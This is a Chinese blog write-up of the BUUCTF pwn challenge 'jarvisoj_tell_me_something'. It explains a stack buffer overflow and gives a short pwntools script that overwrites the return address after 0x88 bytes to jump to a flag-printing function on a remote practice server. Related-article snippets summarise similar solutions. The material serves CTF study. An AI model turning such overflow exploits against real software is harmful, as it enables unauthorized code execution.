BUUCTF:jarvisoj_tell_me_something(write up)

最新推荐文章于 2022-09-03 11:46:21 发布
最新推荐文章于 2022-09-03 11:46:21 发布
阅读量442 收藏
点赞数 1
分类专栏: CTF-PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44768749/article/details/108200010
版权

BUUCTF:jarvisoj_tell_me_something

0x01 文件分析

在这里插入图片描述

仅开启了栈不可执行保护

0x02 运行

在这里插入图片描述

只是输入一条message

0x03 IDA

在这里插入图片描述
在这里插入图片描述

good_game函数将flag.txt内容输出

0x04 思路

  • 是一道简单的栈溢出题,知道覆盖长度即可,gdb调试
    在这里插入图片描述

发现输入message的地址到返回地址的长度为0x88字节

0x05 exp

#!/usr/bin/python2
#coding=utf-8
from pwn import *
from LibcSearcher import *

context(os = "linux", arch = "amd64", log_level= "debug")
p = remote("node3.buuoj.cn", 27132)

payload = "a" * 0x88 + p64(0x400620)
p.sendlineafter("Input your message:\n", payload)

p.interactive()
  筱
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTFjarvisoj_fm(write up)
qq_44768749的博客
08-24 315
BUUCTFjarvisoj_fm0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 开启了栈不可执行、canary以及部分RELRO保护 0x02 运行 运行未发现什么异常,但感觉应该会是格式化字符串漏洞 0x03 IDA 程序比较简单,关键部分都在主函数中,有getshell的函数,当x=4才执行system("/bin/sh") 存在格式化字符串漏洞 0x04 思路 x的值默认为3,需要利用格式化字符串漏洞改写x的值 测试格式
hyperalfred::high_voltage::magnifying_glass_tilted_right::top_hat:使阿尔弗雷德(Alfred)与超级终端一起工作
04-27
超阿尔弗雷德 :high_voltage: :magnifying_glass_tilted_right: :top_hat: 使... tell application " Hyper " to activate end alfred_script on write_to_file ( this_data, target_file, append_data )
jarvisoj_tell_me_something
m0sway的博客
11-23 425
jarvisoj_tell_me_something 使用checksec查看: 看来又是一道栈溢出的题目,直接放IDA查看: 一眼看过去,main()函数中就已经存在栈溢出了 查看字符串可以发现,存在一个flag.txt的字符串,跟进函数查看: 这个函数读取并打印了flag,so…我们只需要return到这个函数即可 需要注意的是: 函数起始的时候并没有将rbp压入栈中,结束的时候也没有leave 所以我们在ret的时候不需要加上偏移,直接在0x88后面加上要ret的函数的地址 exp: from
jarvisoj——Tell Me Something
王嘟嘟的博客
07-14 538
本来想做其他的平台,但是搜了一下还是这个平台比较适合入门。 题目 Wp 这里首先下载,然后ida打开,看到main函数 main函数说的实际上就是有一个保存的栈大小为136,但是确允许输入256栈大小的内容,这里存在栈溢出的问题。 然后这里可以看到有一个good_gaem 可以看到是读取了一个flag.txt的文件。 那么需要做的就是先覆盖,这里我自己感觉的是,覆盖先将自身拉满,然后加返回地址直接覆盖就行。 最后就是先覆盖136的自身,然后加上good_game的地址即可。 pwntools fro
Jarvis OJ Tell Me Something
九层台
04-05 566
nc pwn.jarvisoj.com 9876 题目网址 https://www.jarvisoj.com/challenges 需要原料: python zio模块。 拿到程序名字太长了,改名成 1 用file命令查看文件类型 file 1 1: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically...
[Jarvis OJ - PWN]——Tell Me Something
Y_peak的博客
02-02 283
[Jarvis OJ - PWN]——Tell Me Something 题目地址:https://www.jarvisoj.com/challenges 题目:
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 396
buuctf-pwn 001-016题wp
pwm.rar_Let Me Tell You
09-24
PWM,即脉宽调制(Pulse Width Modulation),是一种常用的技术,用于通过改变信号的高电平时间(占空比)来控制功率或者模拟信号的输出。在C51编程环境中,PWM的生成是嵌入式系统开发中的重要一环,尤其是在驱动...
rest.rar_The Tell
09-23
在IT行业中,`rest.rar_The Tell`这个标题可能指的是一个特定的软件开发项目或代码库,其中包含了一些用于处理磁盘空间检测的功能。在这个场景下,`The Tell`可能是项目的一部分,它专注于检查磁盘的大小是否小于...
LINUX-ACPI.rar_The Tell_acpi
09-20
LINUX ACPI. this artical will tell you some problem occurd under system related to the ACPI function in BIOS
java写的网络围棋程序 .rar
10-30
java写的网络围棋程序,使用java 的网络编程的一个系统
iic.rar_The Tell_msp430f149 IIc
09-23
《IIC通信协议在msp430f149微控制器中的应用详解》 IIC(Inter-Integrated Circuit)通信协议,又称I2C或I²C,是一种由飞利浦(现NXP Semiconductors)公司开发的、用于微控制器和其他设备之间进行低速串行通信的...
buuctf jarvisoj_tell_me_something
carol2358的博客
05-04 197
水题,栈溢出返回到good_game就行了,要注意这题没有bp from pwn import * from LibcSearcher import * local_file = './guestbook' local_libc = '/lib/x86_64-linux-gnu/libc-2.23.so' remote_libc = './libc-2.23.so' select ...
jarvisoj_tell_me_something【BUUCTF
qq_41696518的博客
09-03 186
那就很简单了,溢出指向漏洞函数即可,但此题有个小坑,其实最开始学pwn时会通过gdb查找溢出大小,但后面懒了就直接通过IDA查看,但IDA并不一定准确,并且题目本身也会有坑,比如该题。但本题,main函数没有push ebp的操作,所有溢出时不需要多加8字节ebp位置。
(Jarvis Oj)(Pwn) Tell Me Something
Nothing
06-14 984
(Jarvis Oj)(Pwn) Tell Me Something 首先查看程序开的保护。基本什么都没有。 丢到ida中,主函数。 然后发现了good_game函数。 这个函数的用途就显而易见了,输出目录下的”flag.txt”文件。于是利用read函数导致的栈溢出,将返回地址覆盖为good_game函数的地址。通过ida或者cyclic工具可以获得需要的填充的长度。写得脚本...
[BUUCTF]PWN——jarvisoj_tell_me_something
mcmuyanga的博客
11-02 269
jarvisoj_tell_me_something 附件 步骤: 例行检查,64位程序,开启了NX保护 运行一下程序,看看程序的大概流程 64位ida载入,shift+f12检索程序里的字符串 看到了flag.txt关键子,双击跟进,找到了程序里的后门,flag_addr=0x400620 从main函数开始看程序 输入点的v4明显的溢出漏洞,利用它覆盖返回地址为flag_addr的地址读出flag 这边有一个注意点 看汇编发现这个程序的结尾处跟平常函数的结尾不一样没有leave 这道题
文件操作_tell的用法
最新发布
05-12
在Python中,文件对象提供了一个tell()方法,该方法返回文件指针当前的位置。文件指针表示从文件开头到当前位置的字节数。 下面是一个使用tell()方法的示例: ```python # 打开文件 file = open("example.txt", "r...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值